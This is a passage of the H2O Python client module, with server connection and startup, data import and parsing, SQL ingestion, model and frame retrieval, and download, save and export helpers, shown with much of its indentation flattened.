:param max_mem_size: Maximum memory to use for the new h2o server.
:param min_mem_size: Minimum memory to use for the new h2o server.
:param strict_version_check: If True, an error will be raised if the client and server versions don't match.
    :param ignore_config: If True, processing of the .h2oconfig file is skipped. Default value is False.
:param extra_classpath: List of paths to libraries that should be included on the Java classpath when starting H2O from Python.
:param kwargs: (all other deprecated attributes)
"""
global h2oconn
assert_is_type(url, str, None)
assert_is_type(ip, str, None)
assert_is_type(port, int, str, None)
assert_is_type(https, bool, None)
assert_is_type(insecure, bool, None)
assert_is_type(username, str, None)
assert_is_type(password, str, None)
assert_is_type(cookies, str, [str], None)
assert_is_type(proxy, {str: str}, None)
assert_is_type(start_h2o, bool, None)
assert_is_type(nthreads, int)
assert_is_type(ice_root, str, None)
assert_is_type(enable_assertions, bool)
assert_is_type(max_mem_size, int, str, None)
assert_is_type(min_mem_size, int, str, None)
assert_is_type(strict_version_check, bool, None)
assert_is_type(extra_classpath, [str], None)
assert_is_type(kwargs, {"proxies": {str: str}, "max_mem_size_GB": int, "min_mem_size_GB": int,
"force_connect": bool})
def get_mem_size(mmint, mmgb):
if not mmint: # treat 0 and "" as if they were None
if mmgb is None: return None
return mmgb << 30
if is_type(mmint, int):
# If the user gives some small number just assume it's in Gigabytes...
if mmint < 1000: return mmint << 30
return mmint
if is_type(mmint, str):
last = mmint[-1].upper()
num = mmint[:-1]
if not (num.isdigit() and last in "MGT"):
raise H2OValueError("Wrong format for a *_memory_size argument: %s (should be a number followed by "
"a suffix 'M', 'G' or 'T')" % mmint)
if last == "T": return int(num) << 40
if last == "G": return int(num) << 30
if last == "M": return int(num) << 20
scheme = "https" if https else "http"
    if proxy is not None and scheme in proxy:
        proxy = proxy[scheme]
    elif "proxies" in kwargs and scheme in kwargs["proxies"]:
        proxy = kwargs["proxies"][scheme]
    else:
        proxy = None
mmax = get_mem_size(max_mem_size, kwargs.get("max_mem_size_GB"))
mmin = get_mem_size(min_mem_size, kwargs.get("min_mem_size_GB"))
auth = (username, password) if username and password else None
check_version = True
verify_ssl_certificates = True
# Apply the config file if ignore_config=False
if not ignore_config:
config = H2OConfigReader.get_config()
if url is None and ip is None and port is None and https is None and "init.url" in config:
url = config["init.url"]
if proxy is None and "init.proxy" in config:
proxy = config["init.proxy"]
if cookies is None and "init.cookies" in config:
cookies = config["init.cookies"].split(";")
if auth is None and "init.username" in config and "init.password" in config:
auth = (config["init.username"], config["init.password"])
if strict_version_check is None:
if "init.check_version" in config:
check_version = config["init.check_version"].lower() != "false"
elif os.environ.get("H2O_DISABLE_STRICT_VERSION_CHECK"):
check_version = False
else:
check_version = strict_version_check
if insecure is None:
if "init.verify_ssl_certificates" in config:
verify_ssl_certificates = config["init.verify_ssl_certificates"].lower() != "false"
else:
verify_ssl_certificates = not insecure
if not start_h2o:
print("Warning: if you don't want to start local H2O server, then use of `h2o.connect()` is preferred.")
try:
h2oconn = H2OConnection.open(url=url, ip=ip, port=port, https=https,
verify_ssl_certificates=verify_ssl_certificates,
                                     auth=auth, proxy=proxy, cookies=cookies, verbose=True,
_msgs=("Checking whether there is an H2O instance running at {url}",
"connected.", "not found."))
except H2OConnectionError:
# Backward compatibility: in init() port parameter really meant "baseport" when starting a local server...
if port and not str(port).endswith("+"):
port = str(port) + "+"
if not start_h2o: raise
if ip and not (ip == "localhost" or ip == "127.0.0.1"):
raise H2OConnectionError('Can only start H2O launcher if IP address is localhost.')
hs = H2OLocalServer.start(nthreads=nthreads, enable_assertions=enable_assertions, max_mem_size=mmax,
min_mem_size=mmin, ice_root=ice_root, port=port, extra_classpath=extra_classpath)
h2oconn = H2OConnection.open(server=hs, https=https, verify_ssl_certificates=not insecure,
                                     auth=auth, proxy=proxy, cookies=cookies, verbose=True)
if check_version:
version_check()
h2oconn.cluster.timezone = "UTC"
h2oconn.cluster.show_status()
def lazy_import(path, pattern=None):
"""
Import a single file or collection of files.
:param path: A path to a data file (remote or local).
:param pattern: Character string containing a regular expression to match file(s) in the folder.
:returns: either a :class:`H2OFrame` with the content of the provided file, or a list of such frames if
importing multiple files.
"""
assert_is_type(path, str, [str])
assert_is_type(pattern, str, None)
if is_type(path, str):
return _import(path, pattern)
else:
return [_import(p, pattern)[0] for p in path]
def _import(path, pattern):
assert_is_type(path, str)
assert_is_type(pattern, str, None)
j = api("GET /3/ImportFiles", data={"path": path, "pattern": pattern})
if j["fails"]: raise ValueError("ImportFiles of " + path + " failed on " + str(j["fails"]))
return j["destination_frames"]
def upload_file(path, destination_frame=None, header=0, sep=None, col_names=None, col_types=None,
na_strings=None):
"""
Upload a dataset from the provided local path to the H2O cluster.
Does a single-threaded push to H2O. Also see :meth:`import_file`.
:param path: A path specifying the location of the data to upload.
:param destination_frame: The unique hex key assigned to the imported file. If none is given, a key will
be automatically generated.
:param header: -1 means the first line is data, 0 means guess, 1 means first line is header.
:param sep: The field separator character. Values on each line of the file are separated by
this character. If not provided, the parser will automatically detect the separator.
:param col_names: A list of column names for the file.
:param col_types: A list of types or a dictionary of column names to types to specify whether columns
should be forced to a certain type upon import parsing. If a list, the types for elements that are
        None will be guessed. The possible types a column may have are:
- "unknown" - this will force the column to be parsed as all NA
- "uuid" - the values in the column must be true UUID or will be parsed as NA
- "string" - force the column to be parsed as a string
- "numeric" - force the column to be parsed as numeric. H2O will handle the compression of the numeric
data in the optimal manner.
- "enum" - force the column to be parsed as a categorical column.
- "time" - force the column to be parsed as a time column. H2O will attempt to parse the following
list of date time formats: (date) "yyyy-MM-dd", "yyyy MM dd", "dd-MMM-yy", "dd MMM yy", (time)
"HH:mm:ss", "HH:mm:ss:SSS", "HH:mm:ss:SSSnnnnnn", "HH.mm.ss" "HH.mm.ss.SSS", "HH.mm.ss.SSSnnnnnn".
Times can also contain "AM" or "PM".
:param na_strings: A list of strings, or a list of lists of strings (one list per column), or a dictionary
of column names to strings which are to be interpreted as missing values.
:returns: a new :class:`H2OFrame` instance.
:examples:
>>> frame = h2o.upload_file("/path/to/local/data")
"""
coltype = U(None, "unknown", "uuid", "string", "float", "real", "double", "int", "numeric",
"categorical", "factor", "enum", "time")
natype = U(str, [str])
assert_is_type(path, str)
assert_is_type(destination_frame, str, None)
assert_is_type(header, -1, 0, 1)
assert_is_type(sep, None, I(str, lambda s: len(s) == 1))
assert_is_type(col_names, [str], None)
assert_is_type(col_types, [coltype], {str: coltype}, None)
assert_is_type(na_strings, [natype], {str: natype}, None)
check_frame_id(destination_frame)
if path.startswith("~"):
path = os.path.expanduser(path)
return H2OFrame()._upload_parse(path, destination_frame, header, sep, col_names, col_types, na_strings)
def import_file(path=None, destination_frame=None, parse=True, header=0, sep=None, col_names=None, col_types=None,
na_strings=None, pattern=None):
"""
Import a dataset that is already on the cluster.
The path to the data must be a valid path for each node in the H2O cluster. If some node in the H2O cluster
cannot see the file, then an exception will be thrown by the H2O cluster. Does a parallel/distributed
multi-threaded pull of the data. The main difference between this method and :func:`upload_file` is that
the latter works with local files, whereas this method imports remote files (i.e. files local to the server).
    If you are running the H2O server on your own machine, then both methods behave the same.
:param path: path(s) specifying the location of the data to import or a path to a directory of files to import
:param destination_frame: The unique hex key assigned to the imported file. If none is given, a key will be
automatically generated.
:param parse: If True, the file should be parsed after import. If False, then a list is returned containing the file path.
:param header: -1 means the first line is data, 0 means guess, 1 means first line is header.
:param sep: The field separator character. Values on each line of the file are separated by
this character. If not provided, the parser will automatically detect the separator.
:param col_names: A list of column names for the file.
:param col_types: A list of types or a dictionary of column names to types to specify whether columns
should be forced to a certain type upon import parsing. If a list, the types for elements that are
        None will be guessed. The possible types a column may have are:
- "unknown" - this will force the column to be parsed as all NA
- "uuid" - the values in the column must be true UUID or will be parsed as NA
- "string" - force the column to be parsed as a string
- "numeric" - force the column to be parsed as numeric. H2O will handle the compression of the numeric
data in the optimal manner.
- "enum" - force the column to be parsed as a categorical column.
- "time" - force the column to be parsed as a time column. H2O will attempt to parse the following
list of date time formats: (date) "yyyy-MM-dd", "yyyy MM dd", "dd-MMM-yy", "dd MMM yy", (time)
"HH:mm:ss", "HH:mm:ss:SSS", "HH:mm:ss:SSSnnnnnn", "HH.mm.ss" "HH.mm.ss.SSS", "HH.mm.ss.SSSnnnnnn".
Times can also contain "AM" or "PM".
:param na_strings: A list of strings, or a list of lists of strings (one list per column), or a dictionary
of column names to strings which are to be interpreted as missing values.
:param pattern: Character string containing a regular expression to match file(s) in the folder if `path` is a
directory.
:returns: a new :class:`H2OFrame` instance.
:examples:
>>> # Single file import
>>> iris = import_file("h2o-3/smalldata/iris.csv")
>>> # Return all files in the folder iris/ matching the regex r"iris_.*\.csv"
>>> iris_pattern = h2o.import_file(path = "h2o-3/smalldata/iris",
... pattern = "iris_.*\.csv")
"""
coltype = U(None, "unknown", "uuid", "string", "float", "real", "double", "int", "numeric",
"categorical", "factor", "enum", "time")
natype = U(str, [str])
assert_is_type(path, str, [str])
assert_is_type(pattern, str, None)
assert_is_type(destination_frame, str, None)
assert_is_type(parse, bool)
assert_is_type(header, -1, 0, 1)
assert_is_type(sep, None, I(str, lambda s: len(s) == 1))
assert_is_type(col_names, [str], None)
assert_is_type(col_types, [coltype], {str: coltype}, None)
assert_is_type(na_strings, [natype], {str: natype}, None)
check_frame_id(destination_frame)
patharr = path if isinstance(path, list) else [path]
if any(os.path.split(p)[0] == "~" for p in patharr):
raise H2OValueError("Paths relative to a current user (~) are not valid in the server environment. "
"Please use absolute paths if possible.")
if not parse:
return lazy_import(path, pattern)
else:
return H2OFrame()._import_parse(path, pattern, destination_frame, header, sep, col_names, col_types, na_strings)
def import_sql_table(connection_url, table, username, password, columns=None, optimize=True):
"""
Import SQL table to H2OFrame in memory.
Assumes that the SQL table is not being updated and is stable.
Runs multiple SELECT SQL queries concurrently for parallel ingestion.
Be sure to start the h2o.jar in the terminal with your downloaded JDBC driver in the classpath::
java -cp <path_to_h2o_jar>:<path_to_jdbc_driver_jar> water.H2OApp
Also see :func:`import_sql_select`.
Currently supported SQL databases are MySQL, PostgreSQL, and MariaDB. Support for Oracle 12g and Microsoft SQL
Server is forthcoming.
:param connection_url: URL of the SQL database connection as specified by the Java Database Connectivity (JDBC)
Driver. For example, "jdbc:mysql://localhost:3306/menagerie?&useSSL=false"
:param table: name of SQL table
:param columns: a list of column names to import from SQL table. Default is to import all columns.
:param username: username for SQL server
:param password: password for SQL server
:param optimize: optimize import of SQL table for faster imports. Experimental.
:returns: an :class:`H2OFrame` containing data of the specified SQL table.
:examples:
>>> conn_url = "jdbc:mysql://172.16.2.178:3306/ingestSQL?&useSSL=false"
>>> table = "citibike20k"
>>> username = "root"
>>> password = "abc123"
>>> my_citibike_data = h2o.import_sql_table(conn_url, table, username, password)
"""
assert_is_type(connection_url, str)
assert_is_type(table, str)
assert_is_type(username, str)
assert_is_type(password, str)
assert_is_type(columns, [str], None)
assert_is_type(optimize, bool)
p = {"connection_url": connection_url, "table": table, "username": username, "password": password, "optimize": optimize}
if columns:
p["columns"] = ", ".join(columns)
j = H2OJob(api("POST /99/ImportSQLTable", data=p), "Import SQL Table").poll()
return get_frame(j.dest_key)
def import_sql_select(connection_url, select_query, username, password, optimize=True):
"""
Import the SQL table that is the result of the specified SQL query to H2OFrame in memory.
Creates a temporary SQL table from the specified sql_query.
Runs multiple SELECT SQL queries on the temporary table concurrently for parallel ingestion, then drops the table.
Be sure to start the h2o.jar in the terminal with your downloaded JDBC driver in the classpath::
java -cp <path_to_h2o_jar>:<path_to_jdbc_driver_jar> water.H2OApp
Also see h2o.import_sql_table. Currently supported SQL databases are MySQL, PostgreSQL, and MariaDB. Support
for Oracle 12g and Microsoft SQL Server is forthcoming.
:param connection_url: URL of the SQL database connection as specified by the Java Database Connectivity (JDBC)
Driver. For example, "jdbc:mysql://localhost:3306/menagerie?&useSSL=false"
:param select_query: SQL query starting with `SELECT` that returns rows from one or more database tables.
:param username: username for SQL server
:param password: password for SQL server
:param optimize: optimize import of SQL table for faster imports. Experimental.
:returns: an :class:`H2OFrame` containing data of the specified SQL query.
:examples:
>>> conn_url = "jdbc:mysql://172.16.2.178:3306/ingestSQL?&useSSL=false"
>>> select_query = "SELECT bikeid from citibike20k"
>>> username = "root"
>>> password = "abc123"
>>> my_citibike_data = h2o.import_sql_select(conn_url, select_query,
... username, password)
"""
assert_is_type(connection_url, str)
assert_is_type(select_query, str)
assert_is_type(username, str)
assert_is_type(password, str)
assert_is_type(optimize, bool)
p = {"connection_url": connection_url, "select_query": select_query, "username": username, "password": password,
"optimize": optimize}
j = H2OJob(api("POST /99/ImportSQLTable", data=p), "Import SQL Table").poll()
return get_frame(j.dest_key)
def parse_setup(raw_frames, destination_frame=None, header=0, separator=None, column_names=None,
column_types=None, na_strings=None):
"""
Retrieve H2O's best guess as to what the structure of the data file is.
During parse setup, the H2O cluster will make several guesses about the attributes of
the data. This method allows a user to perform corrective measures by updating the
returning dictionary from this method. This dictionary is then fed into `parse_raw` to
produce the H2OFrame instance.
:param raw_frames: a collection of imported file frames
:param destination_frame: The unique hex key assigned to the imported file. If none is given, a key will
automatically be generated.
:param header: -1 means the first line is data, 0 means guess, 1 means first line is header.
:param separator: The field separator character. Values on each line of the file are separated by
this character. If not provided, the parser will automatically detect the separator.
:param column_names: A list of column names for the file.
:param column_types: A list of types or a dictionary of column names to types to specify whether columns
should be forced to a certain type upon import parsing. If a list, the types for elements that are
        None will be guessed. The possible types a column may have are:
- "unknown" - this will force the column to be parsed as all NA
- "uuid" - the values in the column must be true UUID or will be parsed as NA
- "string" - force the column to be parsed as a string
- "numeric" - force the column to be parsed as numeric. H2O will handle the compression of the numeric
data in the optimal manner.
- "enum" - force the column to be parsed as a categorical column.
- "time" - force the column to be parsed as a time column. H2O will attempt to parse the following
list of date time formats: (date) "yyyy-MM-dd", "yyyy MM dd", "dd-MMM-yy", "dd MMM yy", (time)
"HH:mm:ss", "HH:mm:ss:SSS", "HH:mm:ss:SSSnnnnnn", "HH.mm.ss" "HH.mm.ss.SSS", "HH.mm.ss.SSSnnnnnn".
Times can also contain "AM" or "PM".
:param na_strings: A list of strings, or a list of lists of strings (one list per column), or a dictionary
of column names to strings which are to be interpreted as missing values.
:returns: a dictionary containing parse parameters guessed by the H2O backend.
"""
coltype = U(None, "unknown", "uuid", "string", "float", "real", "double", "int", "numeric",
"categorical", "factor", "enum", "time")
natype = U(str, [str])
assert_is_type(raw_frames, str, [str])
assert_is_type(destination_frame, None, str)
assert_is_type(header, -1, 0, 1)
assert_is_type(separator, None, I(str, lambda s: len(s) == 1))
assert_is_type(column_names, [str], None)
assert_is_type(column_types, [coltype], {str: coltype}, None)
assert_is_type(na_strings, [natype], {str: natype}, None)
check_frame_id(destination_frame)
# The H2O backend only accepts things that are quoted
if is_type(raw_frames, str): raw_frames = [raw_frames]
# temporary dictionary just to pass the following information to the parser: header, separator
kwargs = {"check_header": header, "source_frames": [quoted(frame_id) for frame_id in raw_frames]}
if separator:
kwargs["separator"] = ord(separator)
j = api("POST /3/ParseSetup", data=kwargs)
if "warnings" in j and j["warnings"]:
for w in j["warnings"]:
warnings.warn(w)
# TODO: really should be url encoding...
# TODO: clean up all this
if destination_frame:
j["destination_frame"] = destination_frame
if column_names is not None:
        if not isinstance(column_names, list): raise ValueError("column_names should be a list")
        if len(column_names) != len(j["column_types"]): raise ValueError(
            "length of column_names should be equal to the number of columns: %d vs %d"
            % (len(column_names), len(j["column_types"])))
j["column_names"] = column_names
if column_types is not None:
if isinstance(column_types, dict):
# overwrite dictionary to ordered list of column types. if user didn't specify column type for all names,
# use type provided by backend
if j["column_names"] is None: # no colnames discovered! (C1, C2, ...)
j["column_names"] = gen_header(j["number_columns"])
            if not set(column_types.keys()).issubset(set(j["column_names"])): raise ValueError(
                "names specified in column_types is not a subset of the column names")
idx = 0
column_types_list = []
for name in j["column_names"]:
if name in column_types:
column_types_list.append(column_types[name])
else:
column_types_list.append(j["column_types"][idx])
idx += 1
column_types = column_types_list
elif isinstance(column_types, list):
            if len(column_types) != len(j["column_types"]): raise ValueError(
                "length of column_types should be equal to the number of columns")
column_types = [column_types[i] if column_types[i] else j["column_types"][i] for i in
range(len(column_types))]
        else:  # neither a dictionary nor a list
            raise ValueError("column_types should be a list of types or a dictionary of column names to types")
j["column_types"] = column_types
if na_strings is not None:
if isinstance(na_strings, dict):
# overwrite dictionary to ordered list of lists of na_strings
if not j["column_names"]: raise ValueError("column names should be specified")
if not set(na_strings.keys()).issubset(set(j["column_names"])): raise ValueError(
"names specified in na_strings is not a subset of the column names")
j["na_strings"] = [[] for _ in range(len(j["column_names"]))]
for name, na in na_strings.items():
idx = j["column_names"].index(name)
if is_type(na, str): na = [na]
for n in na: j["na_strings"][idx].append(quoted(n))
elif is_type(na_strings, [[str]]):
if len(na_strings) != len(j["column_types"]):
raise ValueError("length of na_strings should be equal to the number of columns")
j["na_strings"] = [[quoted(na) for na in col] if col is not None else [] for col in na_strings]
elif isinstance(na_strings, list):
j["na_strings"] = [[quoted(na) for na in na_strings]] * len(j["column_types"])
else: # not a dictionary or list
raise ValueError(
"na_strings should be a list, a list of lists (one list per column), or a dictionary of column "
"names to strings which are to be interpreted as missing values")
# quote column names and column types also when not specified by user
if j["column_names"]: j["column_names"] = list(map(quoted, j["column_names"]))
j["column_types"] = list(map(quoted, j["column_types"]))
return j
def parse_raw(setup, id=None, first_line_is_header=0):
"""
Parse dataset using the parse setup structure.
:param setup: Result of ``h2o.parse_setup()``
:param id: an id for the frame.
:param first_line_is_header: -1, 0, 1 if the first line is to be used as the header
:returns: an :class:`H2OFrame` object.
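    :examples: A minimal sketch of the setup-then-parse flow (the file path and frame id are illustrative):
    >>> raw = h2o.import_file("smalldata/iris.csv", parse=False)
    >>> setup = h2o.parse_setup(raw)
    >>> iris = h2o.parse_raw(setup, id="iris_hex", first_line_is_header=1)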
"""
assert_is_type(setup, dict)
assert_is_type(id, str, None)
assert_is_type(first_line_is_header, -1, 0, 1)
check_frame_id(id)
if id:
setup["destination_frame"] = id
    if first_line_is_header not in (-1, 0, 1):
        raise ValueError("first_line_is_header should be -1, 0, or 1")
    setup["check_header"] = first_line_is_header
fr = H2OFrame()
fr._parse_raw(setup)
return fr
def assign(data, xid):
"""
(internal) Assign new id to the frame.
:param data: an H2OFrame whose id should be changed
:param xid: new id for the frame.
:returns: the passed frame.
"""
assert_is_type(data, H2OFrame)
assert_is_type(xid, str)
assert_satisfies(xid, xid != data.frame_id)
check_frame_id(xid)
data._ex = ExprNode("assign", xid, data)._eval_driver(False)
data._ex._cache._id = xid
data._ex._children = None
return data
def deep_copy(data, xid):
"""
Create a deep clone of the frame ``data``.
:param data: an H2OFrame to be cloned
:param xid: (internal) id to be assigned to the new frame.
:returns: new :class:`H2OFrame` which is the clone of the passed frame.
"""
assert_is_type(data, H2OFrame)
assert_is_type(xid, str)
assert_satisfies(xid, xid != data.frame_id)
check_frame_id(xid)
duplicate = data.apply(lambda x: x)
duplicate._ex = ExprNode("assign", xid, duplicate)._eval_driver(False)
duplicate._ex._cache._id = xid
duplicate._ex._children = None
return duplicate
def get_model(model_id):
"""
Load a model from the server.
:param model_id: The model identification in H2O
:returns: Model object, a subclass of H2OEstimator
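    :examples: (the model id below is illustrative)
    >>> model = h2o.get_model("GBM_model_python_1")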
"""
assert_is_type(model_id, str)
model_json = api("GET /3/Models/%s" % model_id)["models"][0]
algo = model_json["algo"]
if algo == "svd": m = H2OSVD()
elif algo == "pca": m = H2OPCA()
elif algo == "drf": m = H2ORandomForestEstimator()
elif algo == "naivebayes": m = H2ONaiveBayesEstimator()
elif algo == "kmeans": m = H2OKMeansEstimator()
elif algo == "glrm": m = H2OGeneralizedLowRankEstimator()
elif algo == "glm": m = H2OGeneralizedLinearEstimator()
elif algo == "gbm": m = H2OGradientBoostingEstimator()
elif algo == "deepwater": m = H2ODeepWaterEstimator()
elif algo == "xgboost": m = H2OXGBoostEstimator()
elif algo == "word2vec": m = H2OWord2vecEstimator()
elif algo == "deeplearning":
if model_json["output"]["model_category"] == "AutoEncoder":
m = H2OAutoEncoderEstimator()
else:
m = H2ODeepLearningEstimator()
elif algo == "stackedensemble": m = H2OStackedEnsembleEstimator()
else:
raise ValueError("Unknown algo type: " + algo)
m._resolve_model(model_id, model_json)
return m
def get_grid(grid_id):
"""
Return the specified grid.
:param grid_id: The grid identification in h2o
:returns: an :class:`H2OGridSearch` instance.
"""
assert_is_type(grid_id, str)
grid_json = api("GET /99/Grids/%s" % grid_id)
models = [get_model(key["name"]) for key in grid_json["model_ids"]]
# get first model returned in list of models from grid search to get model class (binomial, multinomial, etc)
first_model_json = api("GET /3/Models/%s" % grid_json["model_ids"][0]["name"])["models"][0]
gs = H2OGridSearch(None, {}, grid_id)
gs._resolve_grid(grid_id, grid_json, first_model_json)
gs.models = models
hyper_params = {param: set() for param in gs.hyper_names}
for param in gs.hyper_names:
for model in models:
if isinstance(model.full_parameters[param]["actual_value"], list):
hyper_params[param].add(model.full_parameters[param]["actual_value"][0])
else:
hyper_params[param].add(model.full_parameters[param]["actual_value"])
hyper_params = {str(param): list(vals) for param, vals in hyper_params.items()}
gs.hyper_params = hyper_params
gs.model = model.__class__()
return gs
def get_frame(frame_id):
"""
Obtain a handle to the frame in H2O with the frame_id key.
:param str frame_id: id of the frame to retrieve.
:returns: an :class:`H2OFrame` object
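    :examples: (assumes a frame with this id already exists on the cluster)
    >>> fr = h2o.get_frame("iris_hex")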
"""
assert_is_type(frame_id, str)
return H2OFrame.get_frame(frame_id)
def no_progress():
"""
Disable the progress bar from flushing to stdout.
The completed progress bar is printed when a job is complete so as to demarcate a log file.
"""
H2OJob.__PROGRESS_BAR__ = False
def show_progress():
"""Enable the progress bar (it is enabled by default)."""
H2OJob.__PROGRESS_BAR__ = True
def enable_expr_optimizations(flag):
"""Enable expression tree local optimizations."""
ExprNode.__ENABLE_EXPR_OPTIMIZATIONS__ = flag
def is_expr_optimizations_enabled():
return ExprNode.__ENABLE_EXPR_OPTIMIZATIONS__
def log_and_echo(message=""):
"""
Log a message on the server-side logs.
This is helpful when running several pieces of work one after the other on a single H2O
cluster and you want to make a notation in the H2O server side log where one piece of
work ends and the next piece of work begins.
Sends a message to H2O for logging. Generally used for debugging purposes.
:param message: message to write to the log.
"""
assert_is_type(message, str)
api("POST /3/LogAndEcho", data={"message": str(message)})
def remove(x):
"""
Remove object(s) from H2O.
:param x: H2OFrame, H2OEstimator, or string, or a list of those things: the object(s) or unique id(s)
pointing to the object(s) to be removed.
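    :examples: (``fr`` and the string keys are illustrative)
    >>> h2o.remove(fr)                  # remove a single frame
    >>> h2o.remove(["key1", "key2"])    # remove several objects by id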
"""
item_type = U(str, H2OFrame, H2OEstimator)
assert_is_type(x, item_type, [item_type])
if not isinstance(x, list): x = [x]
for xi in x:
if isinstance(xi, H2OFrame):
xi_id = xi._ex._cache._id # String or None
            if xi_id is None: continue  # Lazy frame, never evaluated, nothing in cluster; skip to the next item
rapids("(rm {})".format(xi_id))
xi._ex = None
elif isinstance(xi, H2OEstimator):
api("DELETE /3/DKV/%s" % xi.model_id)
xi._id = None
else:
# string may be a Frame key name part of a rapids session... need to call rm thru rapids here
try:
rapids("(rm {})".format(xi))
except:
api("DELETE /3/DKV/%s" % xi)
def remove_all():
"""Remove all objects from H2O."""
api("DELETE /3/DKV")
def rapids(expr):
"""
Execute a Rapids expression.
:param expr: The rapids expression (ascii string).
:returns: The JSON response (as a python dictionary) of the Rapids execution.
"""
assert_is_type(expr, str)
return ExprNode.rapids(expr)
def ls():
"""List keys on an H2O Cluster."""
return H2OFrame._expr(expr=ExprNode("ls")).as_data_frame(use_pandas=True)
def frame(frame_id):
"""
Retrieve metadata for an id that points to a Frame.
:param frame_id: the key of a Frame in H2O.
:returns: dict containing the frame meta-information.
"""
assert_is_type(frame_id, str)
return api("GET /3/Frames/%s" % frame_id)
def frames():
"""
Retrieve all the Frames.
:returns: Meta information on the frames
"""
return api("GET /3/Frames")
def download_pojo(model, path="", get_jar=True, jar_name=""):
"""
Download the POJO for this model to the directory specified by path; if path is "", then dump to screen.
:param model: the model whose scoring POJO should be retrieved.
:param path: an absolute path to the directory where POJO should be saved.
:param get_jar: retrieve the h2o-genmodel.jar also (will be saved to the same folder ``path``).
:param jar_name: Custom name of genmodel jar.
:returns: location of the downloaded POJO file.
"""
assert_is_type(model, ModelBase)
assert_is_type(path, str)
assert_is_type(get_jar, bool)
if not model.have_pojo:
raise H2OValueError("Export to POJO not supported")
if path == "":
java_code = api("GET /3/Models.java/%s" % model.model_id)
print(java_code)
return None
else:
filename = api("GET /3/Models.java/%s" % model.model_id, save_to=path)
if get_jar:
if jar_name == "":
api("GET /3/h2o-genmodel.jar", save_to=os.path.join(path, "h2o-genmodel.jar"))
else:
api("GET /3/h2o-genmodel.jar", save_to=os.path.join(path, jar_name))
return filename
def download_csv(data, filename):
"""
Download an H2O data set to a CSV file on the local disk.
Warning: Files located on the H2O server may be very large! Make sure you have enough
hard drive space to accommodate the entire file.
:param data: an H2OFrame object to be downloaded.
:param filename: name for the CSV file where the data should be saved to.
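    :examples: (``fr`` is assumed to be an existing H2OFrame)
    >>> h2o.download_csv(fr, "my_frame.csv")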
"""
assert_is_type(data, H2OFrame)
assert_is_type(filename, str)
url = h2oconn.make_url("DownloadDataset", 3) + "?frame_id={}&hex_string=false".format(data.frame_id)
with open(filename, "wb") as f:
f.write(urlopen()(url).read())
def download_all_logs(dirname=".", filename=None):
"""
Download H2O log files to disk.
:param dirname: a character string indicating the directory that the log file should be saved in.
    :param filename: a string indicating the name the file should be saved under. Note that the saved format is .zip, so the file name must include the .zip extension.
:returns: path of logs written in a zip file.
    :examples: The following code saves the zip file `'autoh2o_log.zip'` in the directory `your_directory_name`, one level below the current working directory. (Note that `your_directory_name` must already exist.)
>>> h2o.download_all_logs(dirname='./your_directory_name/', filename = 'autoh2o_log.zip')
"""
assert_is_type(dirname, str)
assert_is_type(filename, str, None)
url = "%s/3/Logs/download" % h2oconn.base_url
opener = urlopen()
response = opener(url)
if not os.path.exists(dirname): os.mkdir(dirname)
if filename is None:
if PY3:
headers = [h[1] for h in response.headers._headers]
else:
headers = response.headers.headers
for h in headers:
if "filename=" in h:
filename = h.split("filename=")[1].strip()
break
path = os.path.join(dirname, filename)
response = opener(url).read()
print("Writing H2O logs to " + path)
with open(path, "wb") as f:
f.write(response)
return path
def save_model(model, path="", force=False):
"""
Save an H2O Model object to disk. (Note that ensemble binary models can now be saved using this method.)
:param model: The model object to save.
:param path: a path to save the model at (hdfs, s3, local)
:param force: if True overwrite destination directory in case it exists, or throw exception if set to False.
:returns: the path of the saved model
:examples:
    >>> path = h2o.save_model(my_model, path=my_path)
"""
assert_is_type(model, ModelBase)
assert_is_type(path, str)
assert_is_type(force, bool)
path = os.path.join(os.getcwd() if path == "" else path, model.model_id)
return api("GET /99/Models.bin/%s" % model.model_id, data={"dir": path, "force": force})["dir"]
def load_model(path):
"""
Load a saved H2O model from disk. (Note that ensemble binary models can now be loaded using this method.)
:param path: the full path of the H2O Model to be imported.
:returns: an :class:`H2OEstimator` object
:examples:
    >>> path = h2o.save_model(my_model, path=my_path)
>>> h2o.load_model(path)
"""
assert_is_type(path, str)
res = api("POST /99/Models.bin/%s" % "", data={"dir": path})
return get_model(res["models"][0]["model_id"]["name"])
def export_file(frame, path, force=False, parts=1):
"""
Export a given H2OFrame to a path on the machine this python session is currently connected to.
:param frame: the Frame to save to disk.
:param path: the path to the save point on disk.
:param force: if True, overwrite any preexisting file with the same path
:param parts: enables export to multiple 'part' files instead of just a single file.
Convenient for large datasets that take too long to store in a single file.
Use parts=-1 to instruct H2O to determine the optimal number of part files or
specify your desired maximum number of part files. Path needs to be a directory
when exporting to multiple files, also that directory must be empty.
Default is ``parts = 1``, which is to export to a single file.
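    :examples: (``fr`` and the export path are illustrative)
    >>> h2o.export_file(fr, "/tmp/my_frame.csv", force=True)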
"""
assert_is_type(frame, H2OFrame)
assert_is_type(path, str)
assert_is_type(force, bool)
assert_is_type(parts, int)
H2OJob(api("POST /3/Frames/%s/export" % (frame.frame_id), data={"path": path, "num_parts": parts, "force": force}),
"Export File").poll()
def cluster():
"""Return :class:`H2OCluster` object describing the backend H2O cloud."""
return h2oconn.cluster if h2oconn else None
def create_frame(frame_id=None, rows=10000, cols=10, randomize=True,
real_fraction=None, categorical_fraction=None, integer_fraction=None,
binary_fraction=None, time_fraction=None, string_fraction=None,
value=0, real_range=100, factors=100, integer_range=100,
binary_ones_fraction=0.02, missing_fraction=0.01,
has_response=False, response_factors=2, positive_response=False,
seed=None, seed_for_column_types=None):
"""
Create a new frame with random data.
Creates a data frame in H2O with real-valued, categorical, integer, and binary columns specified by the user.
:param frame_id: the destination key. If empty, this will be auto-generated.
:param rows: the number of rows of data to generate.
:param cols: the number of columns of data to generate. Excludes the response column if has_response is True.
:param randomize: If True, data values will be randomly generated. This must be True if either
categorical_fraction or integer_fraction is non-zero.
:param value: if randomize is False, then all real-valued entries will be set to this value.
:param real_range: the range of randomly generated real values.
:param real_fraction: the fraction of columns that are real-valued.
:param categorical_fraction: the fraction of total columns that are categorical.
:param factors: the number of (unique) factor levels in each categorical column.
:param integer_fraction: the fraction of total columns that are integer-valued.
:param integer_range: the range of randomly generated integer values.
:param binary_fraction: the fraction of total columns that are binary-valued.
:param binary_ones_fraction: the fraction of values in a binary column that are set to 1.
:param time_fraction: the fraction of randomly created date/time columns.
:param string_fraction: the fraction of randomly created string columns.
:param missing_fraction: the fraction of total entries in the data frame that are set to NA.
:param has_response: A logical value indicating whether an additional response column should be prepended to the
final H2O data frame. If set to True, the total number of columns will be ``cols + 1``.
:param response_factors: if has_response is True, then this variable controls the type of the "response" column:
setting response_factors to 1 will generate real-valued response, any value greater or equal than 2 will
create categorical response with that many categories.
